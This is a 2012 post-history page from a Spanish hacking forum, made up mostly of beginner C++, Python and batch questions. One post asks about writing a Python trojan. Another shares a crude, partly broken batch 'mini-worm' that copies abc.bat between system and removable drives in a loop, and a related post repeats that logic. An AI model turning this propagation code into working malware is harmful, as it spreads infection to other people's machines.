elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


  Mostrar Temas
Páginas: 1 2 3 4 5 6 7 [8]
71  Programación / Programación C/C++ / ayuda con kbhit() en: 19 Mayo 2012, 17:08 pm
Hola bueno veran he estado buscando como emular la funcion kbhit() de conio.h en ubuntu, yhe encontrado referencias a curses y ncurses, ademas en este foro me las han recomendado, pero no encuentro la forma de emular esta funcion, agradeceria mucho ayuda. :huh:

Saludos :D
72  Programación / Programación C/C++ / error al compilar en: 18 Mayo 2012, 16:38 pm
Bueno veran, al intentar compilar este programa, que todavia no esta terminado, por supuesto, el compilador me lanza el siguiente error:
"error: a function-definition is not allowed here before '{' token".
Dejo el code por si alguien lo puede solucionar:
Código:
#include <iostream>
#include <unistd.h>

char cookie[8];
int numbercookies=1;
bool bucle=true;

void funcion();

int main()
{
    void funcion()


{
    cout << "I WANT A COOKIE\t" << endl;
    numbercookies++;
    cin >> cookie;
    if (cookie=="cookie") numbercookies--;

    else ;

    if (numbercookies==0) bucle=false;


    sleep(2);
}



    while(bucle==true) funcion();


    return 0;
}

Saludos :D
73  Programación / Programación C/C++ / I want a cookie en: 16 Mayo 2012, 20:10 pm
Hola:

Veran, estoy aprendiendo un poco de C++, y lei algo sobre un virus que sacaba en pantalla 'I WANT A COOKIE' cada cierto intervalo, y que cuando escribias cookie se eliminaba una de estas palabras, y finalmente al eliminarlas todas se cerraba. Decidi hacer una pequeña version de este virus en C++, pero tengo una gran duda: ¿como hago para que mientras que cada intervalo de tiempo este recibiendo las pulsaciones del teclado, o que te de 2 o 3 segundos para escribir y no se interrumpa la ejecución del programa :huh: :huh:?

Saludos y gracias de antemano :D
74  Programación / Scripting / error en python en: 12 Mayo 2012, 19:40 pm
Hola.
Veran, estoy  tratando de hacer un chat muy, muy básico, ya que es la primera vez que hago algo asi.
El problema es que al querer crear un socket se crea una captura de panttalla de la terminal.
Les dejo el código:
Código:
#!usr/bin/env python
try:
 import socket
 contacto=raw_input("""Introduce el nombre del contacto""")
 print """Durante la conversacion, escribe salir  para  cerrar el chat"""
 while true:
  sersoc=socket.socket()
  sersoc.bind((contacto,9998))
  sersoc.listen(1)
  clisoc, (host_c, puerto_c)=sersoc.accept()
  mensajerec=sersoc.recv(2048)
  mensajeen=raw_input('escribe tu mensaje:')
  false if mensajeen==salir
  sersoc.send(mensajeen)
  print mensajerec
except:
 print """Se ha producido un error y no se xk es, no me  he estudiado los
 tipos de excepciones, abre y cierra el chat"""
 raw_input('pulsa enter para salir')
y otro programa similar.
Saludos y gracias de antemano.

PD:Uso Ubuntu 12.04
75  Seguridad Informática / Análisis y Diseño de Malware / ¿se puede hacer un troyano en python? en: 1 Mayo 2012, 20:04 pm
Bueno, veran, tengo entendido que python es un lenguaje de alto nivel, adecuado para aprender ,y de hecho he empezado a aprenderlo.Mis preguntas son:¿se puede compilar python?si es asi, ¿creen que se puede hacer un buen troyano en python?¿seria multiplataforma?
Si se pudiera, me gustaría(a largo plazo, ya que no soy un gran programador) hacer un troyano en python,
pues es bastante facilito.Agradecería mucho algo de orientación. ;)

Saludos.
76  Seguridad Informática / Análisis y Diseño de Malware / porfavor den una opinion en: 23 Abril 2012, 20:02 pm
Bueno he estado intentando crear un mini-gusano (o mejor, practicando batch y pensamiento malicioso a la vez) :¬¬ , y aunque se que seguramente no valdra mucho pido su opinion para tratar de aprender algo.
Lo dejo:
Código:
@echo off
:acb
nircmd wait 150000
if exist %homedrive%"\abc.bat" (goto abc) else goto no
:abc
copy /Y %homedrive%"\abc.bat" "%~d0\" >Nul
nircmd wait 150000
goto acb
:No
if exist %%a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) (goto e) else goto acb
:e
if exist %%a:"\abc.bat" copy /Y %%a:"\abc.bat" %homedrive%
nircmd wait 150000
goto acb

por supuesto esto es solo la parte de la propagacion, y el usar nircmd, un apaño.
Saludos ;D
77  Sistemas Operativos / Windows / ayuda! borre C:\WINDOWS\System32\ping.exe en: 22 Abril 2012, 14:01 pm
Buenas veran yo tenia un virus que hacia que me saltase publicidad en internet explorer
y mi antivirus me decia que el proceso que lo provocaba era C:\WINDOWS\System32\ping.exe,
asi que inicie en modo seguro y elimine este archivo, y ahora mi ordenador tiene una "direccion ip no valida", por lo cual no puedo conectarme a internet.Ya he probado a copiar este archivo de otro ordenador,
pero no funciona.¿Qué puedo hacer? :huh: :huh: :(
78  Programación / Scripting / problema con batch en: 20 Abril 2012, 22:33 pm
bueno yo quiero hacer un programa que compruebe si existe un archivo en %homedrive% y en una unidad extraible recursivamente, para ello he utilizado un bucle if, pero me muestra el siguiente mensaje:
"No se esperaba if en este momento"

Les dejo el código:
Código
  1. @echo off
  2. :abc
  3. if exist E: (goto e) else (goto no)
  4.  
  5. :e
  6. if exist %homedrive%\abc.bat (goto copy)
  7. :no
  8. goto abc
  9. copy %homedrive%\abc.bat E:
--------------------o---------------------
perdonen que no presente el code como codigo,
es que soy nuevo,si me pueden decir que etiqueta utilizar lo agradeceria tambien.


Páginas: 1 2 3 4 5 6 7 [8]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines